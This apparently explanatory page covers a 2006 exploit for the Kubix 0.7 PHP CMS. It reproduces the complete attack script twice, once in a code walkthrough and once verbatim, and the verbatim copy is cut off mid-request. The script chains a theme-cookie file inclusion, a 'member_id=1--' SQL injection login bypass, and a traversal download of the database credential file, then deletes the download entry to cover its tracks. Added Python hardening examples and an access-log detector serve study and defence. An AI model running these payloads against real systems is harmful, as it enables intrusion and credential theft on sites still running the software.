Exploiting Kubix 0.7: A Deep Dive into Historical Web Application Vulnerabilities

What this paper is
This paper, published on milw0rm in November 2006 by BlackHawk, details three vulnerabilities in Kubix version 0.7, a PHP/MySQL content management system. The accompanying exploit script shows how to chain them to gain unauthorized access and extract sensitive information. The vulnerabilities discussed are:
- Local File Inclusion (LFI): an unvalidated `theme` cookie lets an attacker include arbitrary files from the server's filesystem.
- Login Bypass: SQL injection through the `member_id` cookie lets an attacker authenticate as any existing user, including administrators, without knowing a password hash.
- Arbitrary File Download: with an administrator's user ID, an attacker can register a download entry for a file outside the Downloads directory (the exploit targets includes/connect.php, the database connection file) and then fetch it.
The paper also includes the original PHP source code for the exploit.
Simple technical breakdown
The Kubix 0.7 application had three flaws:
- Local File Inclusion. includes/head.php copies the `theme` cookie into `$default_theme` and runs `include "themes/$default_theme/header.php"` without any validation. A cookie such as `../../../../../etc/passwd%00` walks out of the themes directory, and the URL-decoded null byte truncates the path before the trailing `/header.php` on PHP versions older than 5.3.4. With `magic_quotes_gpc` enabled the null byte is escaped and the trick fails, which is why the author marks the attack as working only with mq=off.
- Login Bypass. includes/functions.php authenticates every request from the `member_id` and `pass_hash` cookies by interpolating them straight into `SELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'`. Setting `member_id` to `1--` turns the rest of the WHERE clause into a SQL comment, so the query returns exactly one row for any existing user ID and the `pass_hash` check never runs.
- Arbitrary File Download. The admin module includes/adm/add_dl.php registers a download entry after checking only `file_exists("Downloads/$file")`. A filename such as `../includes/connect.php` passes that check because the traversal resolves to an existing file, and the entry can then be fetched through downloads.php?act=dl. This requires an administrator's user ID, which the login bypass supplies.
The provided exploit script automates these attacks by sending crafted HTTP requests to the target server.
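The three flaws above, re-implemented in Python as an added example (this is not Kubix code and not part of the original advisory), so that each bypass can be executed and the hardened form checked beside it. It models the PHP behaviour the advisory relies on: URL decoding of the cookie, NUL truncation of include paths on PHP before 5.3.4, the `-- ` SQL comment (SQLite, used here, treats it like MySQL does) and the `file_exists("Downloads/$file")` check. The install root `/var/www/kubix`, the theme list, the single admin row and the temporary directory tree are constructed stand-ins.

```python
"""Kubix 0.7's three input-handling flaws, modelled next to hardened versions.

Added example: not Kubix code and not part of the original advisory. Each
vulnerable PHP fragment quoted on this page is re-implemented so the bypass
can be executed and the fix checked. Constructed here, not taken from a
real install: the root path, theme list, members table and directory tree.
"""
import os
import re
import sqlite3
import tempfile
from urllib.parse import unquote

# --- 1. includes/head.php: theme cookie -> include path ----------------------

def theme_include_path_vulnerable(root, theme_cookie):
    """Mirror of  include "themes/$default_theme/header.php"  with the raw cookie.
    PHP URL-decodes the cookie, so %00 becomes a real NUL; PHP before 5.3.4
    handed the C library a string that ended at that NUL, which the split
    below models. Returns the file the include would actually have opened."""
    path = f"{root}/themes/{unquote(theme_cookie)}/header.php"
    path = path.split("\0", 1)[0]                 # NUL truncation (pre-5.3.4)
    return os.path.normpath(path)

THEME_NAME = re.compile(r"^[A-Za-z0-9_-]+$")

def theme_include_path_safe(root, theme_cookie, installed_themes):
    """Hardened: the cookie must be an installed theme name, never a path."""
    if THEME_NAME.match(theme_cookie) and theme_cookie in installed_themes:
        return os.path.normpath(f"{root}/themes/{theme_cookie}/header.php")
    return os.path.normpath(f"{root}/themes/default/header.php")

# --- 2. includes/functions.php: member_id cookie -> SQL -----------------------

def make_members_db():
    """Constructed stand-in for the members table: one admin row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER, name TEXT, member_login_key TEXT)")
    db.execute("INSERT INTO members VALUES (1, 'admin', 'constructed-login-key')")
    return db

def login_vulnerable(db, member_id, pass_hash):
    """Mirror of the interpolated mysql_query() string. With member_id '1--'
    everything after '-- ' is a comment in MySQL and SQLite alike, so the
    member_login_key condition disappears and the admin row comes back."""
    sql = (f"SELECT name FROM members WHERE id = {member_id} "
           f"AND member_login_key = '{pass_hash}'")
    rows = db.execute(sql).fetchall()
    return rows[0][0] if len(rows) == 1 else None

def login_safe(db, member_id, pass_hash):
    """Hardened: reject a non-numeric id and bind both values as parameters."""
    if not member_id.isdigit():
        return None
    rows = db.execute("SELECT name FROM members WHERE id = ? AND member_login_key = ?",
                      (int(member_id), pass_hash)).fetchall()
    return rows[0][0] if len(rows) == 1 else None

# --- 3. includes/adm/add_dl.php: file_exists("Downloads/$file") --------------

def make_kubix_tree():
    """Constructed install tree: Downloads/manual.pdf and includes/connect.php."""
    root = tempfile.mkdtemp(prefix="kubix_")
    os.makedirs(os.path.join(root, "Downloads"))
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "Downloads", "manual.pdf"), "w") as fh:
        fh.write("%PDF-1.4 constructed\n")
    with open(os.path.join(root, "includes", "connect.php"), "w") as fh:
        fh.write("<?PHP $dbpass = 'constructed'; ?>\n")
    return root

def add_download_vulnerable(root, file):
    """Mirror of the existence check that gates the INSERT. '../includes/connect.php'
    passes because Downloads/../includes/connect.php is a real file."""
    return os.path.exists(os.path.join(root, "Downloads", file))

def add_download_safe(root, file):
    """Hardened: resolve the path and insist that it stays inside Downloads/."""
    downloads = os.path.realpath(os.path.join(root, "Downloads"))
    target = os.path.realpath(os.path.join(downloads, file))
    inside = os.path.commonpath([downloads, target]) == downloads
    return inside and os.path.isfile(target)

if __name__ == "__main__":
    root = "/var/www/kubix"
    payload = "../../../../../etc/passwd%00"
    print("LFI  vulnerable ->", theme_include_path_vulnerable(root, payload))
    print("LFI  hardened   ->", theme_include_path_safe(root, payload, {"default", "blue"}))
    db = make_members_db()
    print("SQLi vulnerable ->", login_vulnerable(db, "1--", ""))
    print("SQLi hardened   ->", login_safe(db, "1--", ""))
    tree = make_kubix_tree()
    print("DL   vulnerable ->", add_download_vulnerable(tree, "../includes/connect.php"))
    print("DL   hardened   ->", add_download_safe(tree, "../includes/connect.php"))
```

Each hardened function rejects the class of input rather than the specific payload: a theme is looked up in an allow-list, the member ID is typed and bound, and the download path is resolved and checked for containment. Stripping `..` or `%00` from the input, which is the fix a quick patch would reach for, leaves the underlying string interpolation in place and is not shown here for that reason.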
Complete code and payload walkthrough
The provided PHP script acts as an exploit tool for Kubix 0.7. Let's break down its components:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Kubix <=0.7 Multiple Vulnerabilities Exploit\r\n";
echo "Site: http://www.kubixproject.net\r\n";
echo "Dork: Powered by: Kubix\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to Kubix\r\n";
echo "AttackType: 1 - Local File Inclusion (mq=off)\r\n";
echo " |-> Related: path of the file to include\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n";
echo " 2 - Login Bypass (PoC)\r\n";
echo " |-> Related: Valid User ID (do nothing.. only to show how does it works)\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 2 1\r\n\r\n";
echo " 3 - Download connect.php file\r\n";
echo " |-> Related: Valid Admin User ID\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 3 1\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
// ... (Vulnerability descriptions and comments) ...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { // keep reading until EOF and the CRLF CRLF header terminator have both been seen (unchanged from the original)
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Local file inclusion
$file_inc=$argv[4];
for ($i=5; $i<=$argc-1; $i++){
$file_inc.=" ".$argv[$i];
}
$file_inc = urlencode($file_inc).'%00';
echo "Attack No 1 - Local File Inclusion\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: theme=".$file_inc.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo $html;
echo "\r\n-- End of Result--";
break;
case 2: // Login Bypass
$usr_id=$argv[4];
echo "Attack No 2 - Login Bypass\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Logged in.. But this is just a PoC..";
break;
break;
case 3: // connect.php download
$usr_id=$argv[4];
$data="title=DaForno_Imperat";
$data.="&file=../includes/connect.php";
$data.="&desc=BlackHawk_Rulez";
$data.="&Submit=Submit";
$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$valid_id=0;
for ($i=0; $i<=50; $i++){
$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"DaForno_Imperat"))
{
$valid_id=$i;
}
}
$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<?PHP",$html);
$temp2=explode("?>",$temp[1]);
echo "<?PHP\r\n".$temp2[0]."\r\n?>";
$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "\r\n\r\n\r\nAll Done.. Enjoy..";
break;
}
?>
Key Code Blocks and Their Purposes:
Shebang and Initial Setup
`#!/usr/bin/php -q -d short_open_tag=on` followed by `<?`
- Purpose: runs the file with the PHP command-line interpreter. `-d short_open_tag=on` enables the short `<?` opening tag that the next line uses in place of `<?php`. `-q` is quiet mode, which suppresses HTTP header output; it only matters for the CGI SAPI and is a no-op under the CLI.
Banner and Usage Information
- Purpose: the `echo` statements print the exploit name, author and target. `if ($argc<4)` checks that at least three arguments (host, path, attack type) were supplied and otherwise prints the usage text and calls `die`.
- Mapping: `$argc` is the argument count and `$argv` the argument array. `$argv[0]` is the script name, `$argv[1]` the target host, `$argv[2]` the path to the Kubix installation, `$argv[3]` the attack type (1, 2 or 3), and `$argv[4]` onwards the attack-specific parameter. The usage text calls the first argument "Site" on one line and "Host" on the next; both mean `$argv[1]`.
Configuration and Helper Functions
- `error_reporting(0)` suppresses all PHP warnings and errors, `ini_set("max_execution_time",0)` removes the execution time limit, and `ini_set("default_socket_timeout",5)` makes socket reads give up after five seconds.
- `quick_dump($string)` returns a hex and ASCII dump of its argument, fifteen bytes per line. It is carried over from rgod's exploit template and is never called in this script.
- `$proxy_regex` matches an IPv4 address and port in `a.b.c.d:port` form and is used to validate `$proxy`.
- `sendpacketii($packet)` is the transport for every attack. It opens a raw TCP socket with `fsockopen`, either to `gethostbyname($host)` on `$port` or, when `$proxy` is set, to the proxy address; writes the prepared request with `fputs`; reads the entire response into the global `$html` (line by line with `fgets` for a direct connection, byte by byte with `fread` through a proxy, stopping once EOF is reached and the `CRLF CRLF` header terminator has been seen); and closes the socket. The proxy branch uses `eregi`, which was removed in PHP 7, so the script needs PHP 5 to run as written.
Global Variables and Argument Parsing
- `$host`, `$path` and `$attack_type` are taken from `$argv[1]` to `$argv[3]`; `$port` is fixed at 80 and `$proxy` is empty, so a proxy can only be used by editing the script. The path must begin and end with `/`, otherwise the script stops with "Error... check the path!". `$p` is the request target: the bare path for a direct connection, or the absolute URL `http://host:port/path` when going through a proxy, as HTTP proxies expect.
Attack Type Switch Statement
- `switch($attack_type)` selects one of the three cases below. The second `break` after case 2 is unreachable and harmless.
Case 1: Local File Inclusion (LFI)
- `$file_inc=$argv[4]` and the loop over `$argv[5]` onwards rejoin a path that the shell split on spaces. `urlencode($file_inc).'%00'` encodes the path and appends an encoded null byte. PHP decodes `%00` into a real NUL when it populates `$_COOKIE['theme']`, and on PHP versions before 5.3.4 that NUL terminates the C string handed to the filesystem, so `include "themes/$default_theme/header.php"` opens `themes/../../../../../etc/passwd` instead of a header file. With `magic_quotes_gpc` enabled the NUL is escaped as `\0`, the trailing `/header.php` survives, and the include fails; that is why the usage text marks this attack `mq=off`.
- The request is a `GET` for `index.php`, which loads includes/head.php, carrying `Cookie: theme=<payload>;`. `$packet.=$data;` appends `$data`, which is undefined in this case; under `error_reporting(0)` that is a silent no-op and the request body stays empty. The server's response, with the included file's contents, is printed between the "Start of Result" and "End of Result" markers.
Case 2: Login Bypass
- `$usr_id=$argv[4]` is the target user ID. The request is a `GET` for `index.php` with `Cookie: member_id=<id>--;`. In includes/functions.php the cookie is interpolated into `SELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'`, which for ID 1 becomes `SELECT name FROM $members WHERE id = 1-- AND member_login_key = ''`. MySQL treats `-- ` followed by whitespace (the space before `AND` supplies it) as a comment to end of line, so the `member_login_key` check is discarded and the query returns one row whenever a user with that ID exists, which sets `$isLoggedIn = 1`.
- The script prints "Logged in.. But this is just a PoC.." without inspecting the response. Nothing persists server side: Kubix re-evaluates the cookies on every request, so the "login" consists of attaching the same cookie to later requests, which is exactly what case 3 does.
Case 3: Download connect.php file
- `$data` is the form body for the add-download module: `title=DaForno_Imperat` (a marker string used to find the entry afterwards), `file=../includes/connect.php` (the target), `desc=BlackHawk_Rulez` and `Submit=Submit`. It is posted to `adm_index.php?mod=add_dl` with the `member_id=<admin id>--` cookie from case 2, so the admin module accepts the request. Server side, `file_exists("Downloads/$file")` is satisfied because `Downloads/../includes/connect.php` resolves to the real includes/connect.php, and the row is inserted. The browser-like `Accept`, `Referer` and `User-Agent` headers are cosmetic.
- The loop requests `downloads.php?ID=0` through `ID=50` and records in `$valid_id` the last ID whose page contains the marker title. An entry that lands beyond ID 50 is not found; that is a limit of the exploit, not of the vulnerability.
- `downloads.php?act=dl&ID=<valid_id>` fetches the registered file. The download handler sends connect.php as data rather than executing it, so the response contains its source; `explode("<?PHP",$html)` and `explode("?>",...)` cut out the first `<?PHP ... ?>` block, which holds the database connection settings, and print it. `explode` is case-sensitive, so this relies on connect.php opening with the upper-case `<?PHP` tag.
- The final request to `adm_index.php?mod=edit_dl&act=del&type=file&ID=<valid_id>` deletes the download entry to remove the trace from the admin panel. The requests themselves remain in the web server's access log.
Mapping of Code Fragments to Practical Purpose:
| Code Fragment/Block | Practical Purpose |
| --- | --- |
| `#!/usr/bin/php -q -d short_open_tag=on` | Run under the PHP CLI and allow the `<?` short tag |
| `if ($argc<4) { ... die; }` | Validate the argument count and print usage |
| `error_reporting(0)` | Hide PHP warnings and errors from the output |
| `ini_set("max_execution_time",0)` | No time limit during the 51-request ID sweep |
| `ini_set("default_socket_timeout",5)` | Give up on an unresponsive socket after 5 s |
| `quick_dump()` | Hex/ASCII dump helper from the template, unused here |
| `$proxy_regex` | Validate the optional `ip:port` proxy string |
| `sendpacketii()` | Send one raw HTTP/1.0 request and collect the response in `$html` |
| `$p` | Request target: the path, or an absolute URL when proxied |
| `Cookie: theme=<path>%00` | LFI payload for includes/head.php |
| `Cookie: member_id=<id>--` | SQL comment injection that drops the password-hash check |
| `POST adm_index.php?mod=add_dl` with `file=../includes/connect.php` | Register a download entry that points outside Downloads/ |
| `GET downloads.php?ID=0..50` | Locate the new entry by its marker title |
| `GET downloads.php?act=dl&ID=<n>` | Retrieve the connect.php source |
| `GET adm_index.php?mod=edit_dl&act=del&type=file&ID=<n>` | Delete the entry afterwards |
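What the case 3 sequence leaves behind on the server, as an added example that is not part of the original advisory: a detector for the exploit's request pattern over Apache access log lines. The lines are constructed for illustration and follow the combined log format with one assumed extension, a trailing quoted field holding the request Cookie header (`%{Cookie}i` appended to the LogFormat). That field is what exposes attacks 1 and 2, whose payloads travel in the `theme` and `member_id` cookies that the default combined format never records. Attack 3 is visible in any access log: a POST to `adm_index.php?mod=add_dl`, a burst of `downloads.php?ID=N` requests, a `downloads.php?act=dl` fetch and an `edit_dl&act=del` cleanup from one client. The client addresses, the sweep threshold and the window length are assumptions.

```python
"""Detecting the Kubix 0.7 exploit sequence in web server access logs.

Added example, not part of the original advisory. The log lines below are
constructed. They follow Apache's combined format plus one assumed
extension: a trailing quoted field holding the request Cookie header
(%{Cookie}i appended to the LogFormat). Without that field attacks 1 and 2
leave no trace in the access log, because their payloads are cookies.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"(?: "(?P<cookie>[^"]*)")?$')

def parse_line(line):
    """Split one access-log line into ip, timestamp, method, path, query and cookies."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    rec["cookies"] = {}
    for part in (rec["cookie"] or "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            rec["cookies"][k] = unquote(v)        # the value the application decoded
    return rec

def detect(lines, sweep_min=5, sweep_window=60):
    """Return {client_ip: [finding, ...]} for the exploit's request signatures."""
    findings = defaultdict(list)
    sweeps = defaultdict(list)                    # ip -> [(ts, ID)] from downloads.php?ID=N

    def note(ip, msg):                            # one finding per distinct message
        if msg not in findings[ip]:
            findings[ip].append(msg)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, q, c = rec["ip"], rec["query"], rec["cookies"]
        script = rec["path"].rsplit("/", 1)[-1]
        # Attack 3: add_dl POST, ID sweep, act=dl fetch, edit_dl&act=del cleanup
        if script == "adm_index.php" and rec["method"] == "POST" and q.get("mod") == "add_dl":
            note(ip, "download entry created via adm_index.php?mod=add_dl")
        if script == "adm_index.php" and q.get("mod") == "edit_dl" and q.get("act") == "del":
            note(ip, "download entry deleted via adm_index.php?mod=edit_dl&act=del")
        if script == "downloads.php" and q.get("act") == "dl":
            note(ip, f"file fetched via downloads.php?act=dl&ID={q.get('ID')}")
        if script == "downloads.php" and "ID" in q and "act" not in q:
            sweeps[ip].append((rec["ts"], q["ID"]))
        # Attacks 1 and 2: only visible when the Cookie header is logged
        theme = c.get("theme", "")
        if "\x00" in theme or "../" in theme:
            note(ip, f"LFI attempt in theme cookie: {theme!r}")
        member_id = c.get("member_id", "")
        if member_id and not member_id.isdigit():
            note(ip, f"SQL injection in member_id cookie: {member_id!r}")
    # Sweep: at least sweep_min distinct IDs from one client inside sweep_window seconds
    for ip, hits in sweeps.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ids = {h[1] for h in hits[i:] if (h[0] - start).total_seconds() <= sweep_window}
            if len(ids) >= sweep_min:
                note(ip, f"download ID enumeration: {len(ids)} IDs within {sweep_window}s")
                break
    return dict(findings)

# Constructed sample: one attacker running all three attacks, one ordinary visitor.
ATTACKER, VISITOR = "203.0.113.7", "198.51.100.3"
_UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"'

def _line(ip, secs, method, target, cookie):
    return (f'{ip} - - [29/Nov/2006:15:37:{secs:02d} +0100] "{method} {target} HTTP/1.0" '
            f'200 512 {_UA} "{cookie}"')

SAMPLE_LOG = (
    [_line(VISITOR, 0, "GET", "/kubix/index.php", "theme=blue; member_id=4; pass_hash=9c1f"),
     _line(ATTACKER, 1, "GET", "/kubix/index.php", "theme=../../../../../etc/passwd%00"),
     _line(ATTACKER, 2, "POST", "/kubix/adm_index.php?mod=add_dl", "member_id=1--;")]
    + [_line(ATTACKER, 3 + i, "GET", f"/kubix/downloads.php?ID={i}", "member_id=1--;") for i in range(8)]
    + [_line(ATTACKER, 12, "GET", "/kubix/downloads.php?act=dl&ID=3", "member_id=1--;"),
       _line(ATTACKER, 13, "GET", "/kubix/adm_index.php?mod=edit_dl&act=del&type=file&ID=3", "member_id=1--;")]
)

if __name__ == "__main__":
    for ip, hits in detect(SAMPLE_LOG).items():
        print(ip)
        for h in hits:
            print("  -", h)
```

The sweep rule is the robust part: it keys on request shape and timing, not on the exploit's fixed strings, so a copy with a different marker title or user agent still triggers it. The two cookie rules are only as good as the logging behind them; on a default combined-format deployment the attacker's LFI and login-bypass requests look like ordinary page views.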
Original Exploit-DB Content (Verbatim)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Kubix <=0.7 Multiple Vulnerabilities Exploit\r\n";
echo "Site: http://www.kubixproject.net\r\n";
echo "Dork: Powered by: Kubix\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to Kubix\r\n";
echo "AttackType: 1 - Local File Inclusion (mq=off)\r\n";
echo " |-> Related: path of the file to include\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n";
echo " 2 - Login Bypass (PoC)\r\n";
echo " |-> Related: Valid User ID (do nothing.. only to show how does it works)\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 2 1\r\n\r\n";
echo " 3 - Download connect.php file\r\n";
echo " |-> Related: Valid Admin User ID\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 3 1\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
/*
There are some critical vulnerabilities in this quite pretty CMS..
Vuln N° 1 - Local File Inclusion:
vuln file: includes/head.php
code:
------
if(isset($_COOKIE['theme']) && $_COOKIE['theme'] != "")
{
$default_theme = $_COOKIE['theme'];
}
[...]
include "themes/$default_theme/header.php";
?>
------
attacker can execute a LocalFile by setting the 'theme' cookie value properly;
Es: ../../../../../../etc/passwd%00
Becasuse of the last null char this one works only with MQ=off
Vuln N° 2 - Login Bypass:
vuln file: includes/functions.php
code:
------
// If the member_id cookie is set...
if(isset($_COOKIE['member_id']) && $_COOKIE['member_id'] != 0 && $_COOKIE['member_id'] != "")
{
$id = $_COOKIE['member_id'];
$pass_hash = $_COOKIE['pass_hash'];
$sql = mysql_query("SELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'");
$numrows = mysql_num_rows($sql);
if($numrows != 1)
{
$isLoggedIn = "";
}
else
{
$isLoggedIn = 1;
}
}
------
Attacker can Bypass login by setting 'member_id' cookie value properly and making a SQL Injection attack;
Es: 1--
Vuln N° 3 - connect.php (or what you want) file download:
vuln file: includes/adm/add_dl.php
code:
------
if(isset($_POST['Submit']) && $_POST['title'] != "" && $_POST['file'] != "" && $_POST['desc'] != "")
{
$title = $_POST['title'];
$file = $_POST['file'];
$desc = $_POST['desc'];
$cat = $_POST['cats'];
if(file_exists("Downloads/$file"))
{
mysql_query("INSERT INTO kbx_downloads (cat, name, `desc`, `file`) VALUES('$cat', '$title', '$desc', '$file')");
echo '<div class="container center">Download added!<br />Redirecting...</div>';
echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=edit_dl">';
}
else
{
echo '<div class="alert">File Doesnt Exist!</div>';
echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=add_dl">';
}
}
------
Attacker with a valid Admin ID can send a malicious file name to download connect.php;
Es: ../includes/connect.php
Started programming: 15.37 28/11/2006
Ended:
sorry for my bad english but i've done it quicly cause Prof. Da Forno probably will defenestrate me in latin tomorrow :D
BlackHawk <hawkgotyou@gmail.com>
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Local file inclusion
$file_inc=$argv[4];
for ($i=5; $i<=$argc-1; $i++){
$file_inc.=" ".$argv[$i];
}
$file_inc = urlencode($file_inc).'%00';
echo "Attack No 1 - Local File Inclusion\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: theme=".$file_inc.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo $html;
echo "\r\n-- End of Result--";
break;
case 2: // Login Bypass
$usr_id=$argv[4];
echo "Attack No 2 - Login Bypass\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Logged in.. But this is just a PoC..";
break;
break;
case 3: // connect.php download
$usr_id=$argv[4];
$data="title=DaForno_Imperat";
$data.="&file=../includes/connect.php";
$data.="&desc=BlackHawk_Rulez";
$data.="&Submit=Submit";
$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
